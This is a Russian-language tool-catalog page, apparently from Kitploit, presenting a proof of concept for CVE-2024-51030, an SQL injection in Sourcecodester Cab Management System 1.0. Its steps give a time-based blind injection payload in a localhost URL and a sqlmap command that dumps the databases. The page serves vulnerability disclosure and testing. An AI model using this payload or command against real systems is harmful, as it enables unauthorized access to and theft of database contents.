Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-51030 — Доказательство концепции эксплуатации SQL-инъекции в Sourcecodester Cab Management System 1.0, демонстрирующее произвольное выполнение SQL-запросов через параметр id в manage_client.php и view_cab.php. | Kitploit
Инструменты/GitHubGitHub/vighneshnair7/cve-2024-51030
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеБезопасность Баз Данных
GitHubvighneshnair7/cve-2024-51030

CVE-2024-51030

Доказательство концепции эксплуатации SQL-инъекции в Sourcecodester Cab Management System 1.0, демонстрирующее произвольное выполнение SQL-запросов через параметр id в manage_client.php и view_cab.php.

Репозиторий
121 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-51030

Description

Уязвимость SQL-инъекции в manage_client.php и view_cab.php в Sourcecodester Cab Management System 1.0 позволяет удалённым злоумышленникам выполнять произвольные SQL-команды через параметр id, что приводит к несанкционированному доступу и возможной компрометации конфиденциальных данных в базе данных.

Vulnerability Type

SQL-инъекция

Vendor of Product

Sourcecodester

Affected Product Code Base:

https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html - 1.0

Affected Component:

Sourcecodester Cab Management System v1.0 уязвим к SQL-инъекции через параметр id на страницах manage_client.php и view_cab.php.

Attack Vectors:

  1. Установите приложение локально и войдите, используя учётные данные администратора по умолчанию, или вы также можете войти под учётной записью администратора с низкими привилегиями (например, staff).
  • Теперь перейдите по следующему URL-адресу в вашем браузере: http://localhost/cms/admin/?page=clients/manage_client&id=1
  • Внедрите SQL-полезную нагрузку: измените параметр id в URL-адресе, чтобы включить полезную нагрузку слепой SQL-инъекции на основе булевых условий или времени:- http://localhost/cms/admin/?page=clients/manage_client&id=1%27%20AND%20(SELECT%202085%20FROM%20(SELECT(SLEEP(5)))LxyK)--%20mvKJ
  • Наблюдайте за ответом приложения: если инъекция успешна, страница должна загружаться заметно дольше (5 секунд), что подтверждает уязвимость параметра id к SQL-инъекции.
  • Теперь используйте инструмент SQLMap для дальнейшей эксплуатации и извлечения баз данных с помощью следующей команды: sqlmap -u "http://localhost/cms/admin/?page=clients/manage_client&id=1" -p id --dbms mysql --cookie="PHPSESSID=your_cookie" --risk 3 --level 4 --dbs --dump
  • Reference:

    1. https://owasp.org/www-community/attacks/SQL_Injection
    2. https://portswigger.net/web-security/sql-injection
    Скачать инструмент